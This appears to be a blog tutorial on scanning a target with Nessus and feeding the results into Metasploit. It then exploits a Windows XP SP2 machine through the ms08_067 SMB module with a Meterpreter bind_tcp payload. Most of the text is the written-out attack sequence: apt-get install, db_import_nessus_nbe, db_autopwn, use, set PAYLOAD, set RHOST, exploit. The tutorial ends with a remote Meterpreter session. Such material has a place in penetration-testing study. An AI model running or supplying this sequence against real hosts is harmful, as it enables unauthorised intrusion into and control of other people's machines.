Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable against. Nessus is not included in Backtrack 4, so you either have to go to Nessus's Website or use apt-get. The command for apt-get is...
apt-get install nessus nessusd
Now that you have nessus installed, you need to run "nessusd" in a terminal window. Nessusd is the server side of nessus and it holds all of the plugins. Nessusd will take quite a while to load up, but once it's done, launch the client side of nessus (found in the menu, or run "nessus" in a terminal).
NOTE: You may have to add a user. Use "nessus-adduser" for this.
Now that you have nessus running, in the "Nessusd host" tab, put in the username and password. Now hit "Log in." This should connect nessus to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the ip address of your target. Click "Start the scan." After a while, another window will popup with your results. Save them into a file for later (e.g. /root/nessus.nbe).
Now open a terminal window and go to your Metaploit Framework directory (Mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt and now you can create a database to load our nessus nbe file into.
db_create /root/database.db
This will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.
Now do:
db_autopwn -t -x
Metasploit will check the file to see what exploits will work against the machine. Now pick one of the exploits. I'm going to be using "windows/smb/ms08_067" against a windows XP SP2 machine.
use windows/smb/ms08_067
(change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter.
set PAYLOAD windows/meterpreter/bind_tcp
Now set the ip address of your target in the RHOST variable...
set RHOST 192.168.1.113
Now your ready to exploit!
exploit
If everything went well, you should now have a Meterpreter session!
Finding It Hard To Understand , Then I Got A Video For The Same
http://www.youtube.com/watch?v=8TqMDzBiM9Q
**Credits To Nullbyte Security For filming the video.
For Further Reading,
0 comments:
Post a Comment